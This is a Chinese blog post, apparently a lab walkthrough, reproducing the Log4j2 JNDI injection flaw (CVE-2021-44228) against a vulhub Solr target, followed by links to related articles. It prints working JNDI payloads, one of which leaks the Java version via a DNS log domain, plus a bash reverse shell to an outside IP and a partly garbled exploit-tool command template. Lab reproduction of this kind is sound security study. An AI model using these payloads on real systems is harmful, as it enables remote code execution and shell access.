【Log4j2】代码执行漏洞复现!

已于 2024-08-01 09:10:17 修改
阅读量142 收藏
点赞数 2
分类专栏: 靶场通关攻略详解! 文章标签: log4j
于 2024-07-31 21:49:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muyuchen110/article/details/140830799
版权

          执行以下命令

启动命令
systemctl start dockercd vulhub/log4j/CVE-2021-44228docker-compose up -d
# 访问网址
http://192.168.3.42:xxxx/solr/#/

        启动靶场环境并在浏览器访问!!!

      先在自己搭建的DNSLOG平台上获取一个域名来监控我们注入的效果. 

            

                 可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号! 

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.r2rrt.l0gs.4pts.
online}

              开始反弹Shel准备 INDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

              bash -i >& /dev/tcp/101.42.118.221/8080 0>&1  改为监听ip进行base64编码

                

               命令模版:

java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C bash{echo,[经过base64编码后的命令1}{base64,-d}|bash"-A「你的ypsipl

          开启监听访问日志文件 

/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/jyvecl}
/solr/admin/cores?action=${jndi:ldap://101.42.118.221:1389/ek9cvn}
${jndi:ldap://101.42.118.221:1389/uma7pn}

       监听不到 后续做出来补:

Myc.localhost
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 911
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
大华智能物联综合管理平台 log4j远程代码执行漏洞复现
0xSec
05-11 1304
大华ICC智能物联综合管理平台/evo-apigw/evo-brm/1.2.0/user/is-exist 接口处存在log4j远程代码执行漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行,进一步构造系统内部利用链可导致服务器失陷。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行
log4j2远程代码执行漏洞复现
qq_42194976的博客
07-12 998
log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务(可能是攻击者部署好的恶意代码)。攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,造成了远程代码执行(可反弹shell到指定服务器)。
Log4j远程代码执行漏洞环境搭建及复现
m0_71263989的博客
02-20 1459
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。
log4j2远程代码执行漏洞原理及复现
m0_57967573的博客
04-29 1627
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1817
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9883
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
log4j靶场,反弹shell
m0_73771249的博客
09-07 876
1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令。2.发现端口是8983,浏览器访问http://172.16.1.18:8983/4.反弹shell到kali(ip为172.16.1.18)的8888端口。3.用dnslog平台检测dns回显,看看有没有漏洞存在。同时,我们开启对172.16.1.18:8888端口监听。输入whoami命令查看是否获得shell。然后对上述命令进行base64编码,最终 Payload。
log4j 同一线程隔离classloader下MDC信息不同问题解决 ThreadLocal问题分析
CoderCoding的博客
09-06 612
一个任务的日志信息会被莫名的拆分到两个不同目录中。经过分析,首先怀疑的是MDC没有清理的问题,这也是最直观的问题。由于线程会被重用,而MDC是绑定在Threadlocal上的,所以如果没有清理,是会造成上述问题。但是在代码检查中发现在线程的开始,是重新设置过MDC信息的。经过分析,首先怀疑的是MDC没有清理的问题,这也是最直观的问题。由于线程会被重用,而MDC是绑定在Threadlocal上的,所以如果没有清理,是会造成上述问题。但是在代码检查中发现在线程的开始,是重新设置过MDC信息的。
滚雪球学MyBatis-Plus(13):测试与部署
**My Coding Family**
09-05 849
在上期内容中,我们深入探讨了 MyBatis Plus 的高级功能,包括自定义 SQL 注解、批量操作以及数据加密与解密。这些功能极大地提高了开发效率,并增强了数据操作的灵活性和安全性。本期内容将重点介绍 MyBatis Plus 的测试与部署。我们将学习如何编写单元测试和集成测试,确保代码的正确性和可靠性。然后,我们将讨论项目的打包与部署流程,帮助你将开发的应用程序顺利发布到生产环境中。测试是软件开发过程中至关重要的一环。通过测试,我们可以验证代码的正确性,发现潜在的问题,并确保系统的稳定性。
Matlab界面GUI设计的车牌定位[Matlab界面GUI设计].zip
最新发布
09-10
linux常用命令大全
【独家首发】基于matlab沙猫群算法SCSO-GMDH风电数据回归预测【含Matlab源码 7530期】.zip
09-10
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化GMDH回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化GMDH回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化GMDH回归预测 4.4.3 灰狼算法GWO/狼群算法WPA优化GMDH回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化GMDH回归预测 4.4.5 萤火虫算法FA/差分算法DE优化GMDH回归预测 4.4.6 其他优化算法优化GMDH回归预测
【2024首发原创】蜣螂优化算法DBO-TCN-LSTM-Multihead-Attention负荷预测Matlab实现.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
加速仪6050陀螺仪simulink.rar
09-10
加速仪6050陀螺仪simulink.rar
基于ssm的三省学堂—学习辅助系统设计与实现.docx
09-10
基于ssm的三省学堂—学习辅助系统设计与实现.docx
log4j远程代码执行漏洞复现
08-14
很抱歉,我不能提供最新漏洞复现过程。我作为一个 AI 助手,遵循道德准则和法律法规,不参与、支持或提供与安全漏洞相关的活动。漏洞复现涉及到潜在的非法行为和对他人系统的攻击,这是不被允许的。 如果你对最新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值